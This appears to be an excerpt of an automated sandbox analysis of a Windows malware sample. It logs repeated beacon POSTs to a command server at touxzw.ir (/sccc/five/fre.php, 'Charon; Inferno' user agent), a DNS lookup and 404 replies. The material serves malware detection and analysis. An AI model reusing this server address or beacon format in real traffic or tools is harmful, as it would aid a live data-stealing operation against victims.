Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BA22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00BA22EE

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 188Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejmjLELI6A8yqeiJ0CTRpB7CSnqbKcN70UJl8A%2B6HAPsmkvus7NoVux2PmgRf%2FDbBYi5T4Qkks73jyGQ17yQ4YL2PRSRoJeff2tmXt4j%2FiFwJgypNyfAgzTpcYM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0ec0783143d7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2204&min_rtt=2204&rtt_var=1102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eN45DvqFlMmxdn8D%2BIlmoAyJxN7DtIcXVLpjLPaxSyZBgdyvJNa9SwzPsQL5K3916SvOKzhR6B%2BizM6Xf9aVkMeWxzLXTZslDhsBTjBk7VCHeQyiEmx68Jv%2F3cs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0ed29a2a427f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GBIcEbbNt%2FB4WfJnYt8M32M3pDKN9jGYzm7PS26veyM9LFee6SL1rrtqXukx5g8sER%2BshCHYOHpk3idn43iJxmKAX3N6pYy5wFQK1hfJRbmgRA%2BhMFqybpiapDA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0edea8620f81-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1698&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CVEpDi3ySDzgpiJjfUfUAuWGYoXNgIfKKcnQNeJ0aadWM8v2zJhcqqGqz6mmRGcfdWeFfW8yc6MnytrZ5zTb8ydF3n8Ahk2vXqpS8659zTPi7ZOFYgJwOfDvSk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0eeb7dc78c41-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2063&rtt_var=1031&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pfpiWEV7NKyajtQER9%2FHBiBnE7eLpp%2F6TDfSKyIIzt5zdiLbCM%2Fcf%2Fdnigx4ULRLyGGs7FP12VB5gDXLGQdvTW9IoedrJc4KbrmXZKjiO9haT4RH6EpwQAs2Z9s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f03dd1e433f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=795P0CMe3kqwwcE2clhtjlQ%2B3in3Fpm0zRQHha4XK200OnyBeoLl7wuWsadkUgn6Pn8iS5NHCqByJbON%2BIXzx0r8lZ0IAKSJhMeVq2%2FYB5%2BhhszPuunzxE%2FTpIc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f1d48888c8d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2010&rtt_var=1005&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8%2Bb%2BLwTYsKWWTPwAOL28VzOLP9J9hlODnANciXnnWITHO3PKkTREImmGpjZ5dbKCUmLHlK36GDcagZ1C4Xgd7CKbZT%2FMxywsfb0zNU8qxjQzrmXDN7F2b95CCE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f2a9a90c32b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugdhnuYEA0nBK5TEslpYeskMiWjPpsqqvysRHLhhivGQ%2BAVTxCIM%2BhyYAazpjmIj5yp%2F0AZ8NpSMi3dBRhbu76R%2FPHr3lVt%2BL6qAhNlM2CIYMpuktDbKf9krWQE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f373f58437a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E30BdQqhHElXuVCTWVw%2BXR9%2BCym0ZG8foPxfFeZ3DXyx7rLTcPCjYi3CIWl70MX9VIP4XNZykDzRIY%2Fr2pUKGQuVbxrFT%2Bl4Q0obXCzwFvJST8LZqIYFwyhXap8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f4f8e5a5e65-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uUtTuRRB6WdkOFVyZO3ZAmyJGraxGDfUE7BGQ0WlKNxnJKYdWm4OznXZGX5jRRkAbA9QTKFwBXRVI2pjoBr8%2BJr3YQm7Av2QGoHmgqQV3ZCTiILF0SXxrSKfVFs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f5c8e0c333c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2063&rtt_var=1031&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGvHylktyVMPtj%2FsH6BqUPFZnrjj2LQxBl3wAWcK2zaFWmVzSCgy2ZPUJ%2FsFmmh%2BpCu9uqqaHuiSwkHvpUA9%2F9ZrYjKiQb4apWScFvjdSOiSTGaJnxZR2Q3msHY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f6a49b68cc8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1977&rtt_var=988&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:06:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqUu1pj52k7dm8lR0F4qx%2F8RhxZ5RvSc6tIiGQApUhO0YkrD5%2FK64M11E4dF6eE9IXMpQ%2Bg77t6BCPeUbiGAjFVc%2FcQY7Lv4Ra0glLXHyaIbKZ9FSXbaAagO9O8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f767d388c1b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1979&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UX5ckBIyURru%2BEU42u3yjJ0HERjcicuo4uU0NmpM0kXl%2F4O0fLHJF9ZtKqA%2FOJ%2BrmOIJgLPxdnR5gmq3nWuYYBuQs9y2F8cuhTYVO8phN1OQFVn5yCu5QAu6HDw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f81e9184213-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2126&min_rtt=2126&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UX5ckBIyURru%2BEU42u3yjJ0HERjcicuo4uU0NmpM0kXl%2F4O0fLHJF9ZtKqA%2FOJ%2BrmOIJgLPxdnR5gmq3nWuYYBuQs9y2F8cuhTYVO8phN1OQFVn5yCu5QAu6HDw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f81e9184213-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2126&min_rtt=2126&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UX5ckBIyURru%2BEU42u3yjJ0HERjcicuo4uU0NmpM0kXl%2F4O0fLHJF9ZtKqA%2FOJ%2BrmOIJgLPxdnR5gmq3nWuYYBuQs9y2F8cuhTYVO8phN1OQFVn5yCu5QAu6HDw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f81e9184213-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2126&min_rtt=2126&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebjmgLEW%2FCqDVXzRUBFwdDbFgVplfCFz43%2BbetmytTwPmqcQODmzc6z7nU7fSZsNWouZriU%2FAKcusRBpEAPhKqOA69odp213DqDnh%2BQ1z9AdgoGyLhOvSrvdbSY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0f943e26c33a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1523&rtt_var=761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 14:07:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHqncd9tfUYkZ%2BqcOUFH335qe5K7Z2CIArNQIK63jFXKQqe6EAxmoWvFTbaU%2FcevfgMxR95csSFCB7o4qwUuPlYz1HvIRUiA0Z6Dc1L%2F8j8VtQ0y7F7sqQbdOJ0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f0fa049984251-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
